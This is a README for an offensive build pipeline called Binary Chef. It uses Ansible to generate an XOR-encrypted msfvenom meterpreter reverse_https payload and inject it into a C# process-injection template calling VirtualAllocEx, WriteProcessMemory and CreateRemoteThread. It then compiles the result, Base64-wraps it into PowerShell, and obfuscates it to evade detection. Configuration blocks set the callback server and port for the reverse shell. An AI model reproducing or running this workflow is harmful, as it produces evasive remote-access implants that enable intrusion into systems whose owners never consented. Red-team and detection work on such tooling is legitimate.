Binary Chef

Overview:
Binary Chef automates the process of building executables, converting them into PowerShell modules, and obfuscating the resulting .ps1 files using Ansible. This tool utilizes a Jinja template for C# shellcode injection and automates PowerShell script obfuscation through Chameleon.

How It Works

1. Payload Creation & Encryption
   Uses msfencoder (via msfvenom) to generate and encrypt the payload.

2. Template Injection
   A Jinja-based C# template is used to inject the encrypted payload into a specified location in the C# source code.

3. Compilation
   Automatically compiles the modified C# code on a Windows machine.

4. Base64 Encoding
   The compiled executable is encoded to Base64 and then imported into a PowerShell module.

5. Obfuscation
   Finally, the PowerShell script is obfuscated using Chameleon to help evade detection.

Running Ansible

Use the following commands to execute the entire workflow. The first playbook (build-binary.yaml) compiles the binaries, and the second (encode-command.yaml) handles Base64 encoding and further obfuscation:

ansible-playbook build-binary.yaml --ask-become-pass
ansible-playbook encode-command.yaml

Below is a simplified diagram of the workflow:

Requirements

1. Windows (Remote)

• WinRM HTTPS Configuration
  Run Setup/ConfigureWinrmHTTPS.ps1 on your Windows machine to enable WinRM over HTTPS. This is required for Ansible to connect over HTTPS.

• Visual Studio / .NET
  Ensure you have Visual Studio (tested with Visual Studio 2022 Community) and the required .NET packages installed.

2. Linux (Remote)

• Recommended: Kali Linux

3. Local Machine (Linux / macOS)

You will manage three critical settings in your local environment:

1. Connection Options
2. Compiling Options
3. Source Code Options

---

Configuration

Connection Options

Define the IP addresses and login credentials for your Kali and Windows machines in an Ansible inventory file (e.g., hosts):

[kali]
169.254.217.2

[kali:vars]
ansible_host=169.254.217.2
ansible_port=22
ansible_ssh_user=XXXXX
ansible_python_interpreter=python3
# Optional for SSH
# ansible_ssh_private_key_file=~/.ssh/kali.private

[windows]
169.254.217.3

[windows:vars]
ansible_host=169.254.217.3
ansible_user=XXXXX
ansible_password=XXXXX
ansible_connection=winrm
ansible_port=5986
ansible_winrm_server_cert_validation=ignore
ansible_winrm_scheme=https
# ansible_python_interpreter=c:\Python\python
ansible_python_interpreter=python3
# Option for SSH
ansible_ssh_private_key_file=~/.ssh/win11.private

Compiling Options

Install pywinrm on your local machine to enable Ansible to communicate with Windows over WinRM:

• pip3 install pywinrm

Next, adjust the variables in group_vars/all.yaml (or a corresponding group variable file):

Linux

MsfEncode (msfvenom) arguments

server: 169.254.217.2
ports: 443
format: 'cs'
encrypt_method: 'xor'
encrypt_key: '0xfa'
payload: 'windows/meterpreter/reverse_https'

Local Machine

Jinja templates

src: ../../../codemaker/src/*.j2

Output directory for executables

out: ../../../codemaker/out

Windows

Temporary directory on Windows

tempdir: C:/Temp/

CSC.exe compiler path (example: Visual Studio 2022 Community)

compiler: C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\Roslyn\csc.exe

Source Code Options

• Store C# template files in codemaker/src/
• Important: Name them with a .j2 extension so Ansible can process them as Jinja templates.
• Within each template file, include the placeholder {{ payloadContent }} where the shellcode should be inserted. For example:

using System;

public static void Main(string[] args)
{
    {{ payloadContent }}
    
    // Additional code logic here...
    VirtualAllocEx();
    WriteProcessMemory();
    CreateRemoteThread();
}